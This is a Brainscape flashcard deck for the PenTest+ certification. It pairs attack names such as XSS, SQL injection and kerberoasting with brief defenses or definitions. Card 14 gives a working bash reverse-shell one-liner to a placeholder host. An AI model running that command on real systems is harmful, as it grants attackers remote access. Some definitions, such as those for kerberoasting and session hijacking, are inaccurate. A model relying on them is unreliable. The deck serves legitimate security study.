Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

PenTest+ by Scott > ATTACKS > Flashcards

ATTACKS Flashcards

1
Q

Elicitation attack

A

obtaining information without directly asking for it

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Spear Phishing

A

targets specific individuals or groups within an org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Reflected XSS

A

input sanitization (< >…)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

SQL Injection Stacked

A

parameterized queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

DOM XSS

A

input sanitization (< > …)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Local File Inclusion

A

sandbox req

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Command Injection

A

sandbox req

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

SQL Injection Union

A

Parameterized queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

SQL Injection ERROR

A

parametrized queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Remote File Inclusion

A

Sandbox

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Command injection

A

input sanitization $

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

URL Redirect

A

prevent external calls

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Zigbee

A

IoT

internet of things

Zigbee is a wireless technology developed as an open global standard to address the unique needs of low-cost, low-power wireless IoT networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Reverse Shell

A

bash -i >& /dev/tcp/[dest ip]/[port] 0>&1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Point in Time Assessment

A

Compliance-based & Goals-based assessments.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Man in the Middle

A 
ARP Spoofing
Replay
Relay
SSL Striping
Downgrade
17
Q

Invalidated Redirect

A

a web application accepts untrusted input in such a way that it causes a visitor to be redirected to another site.

18
Q

Session Hijacking

A

Session hijacking is used to steal session IDs in which malicious code is installed on the website of a client, and then the cookie for this is stolen.

19
Q

Four types of vulnerability assessments:

A

Active
Passive
Internal
External

20
Q

De Authentication

A

kick devices off router forcing them to re-connect

21
Q

ret2libc

A

privilege escalation inside linux

buffer overrun exploit

22
Q

kerberoasting

A

a password-cracking attack in which credentials are stolen from memory and cracked offline

23
Q

VLAN double-tag

A

802.1Q

PenTest+ by Scott (6 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions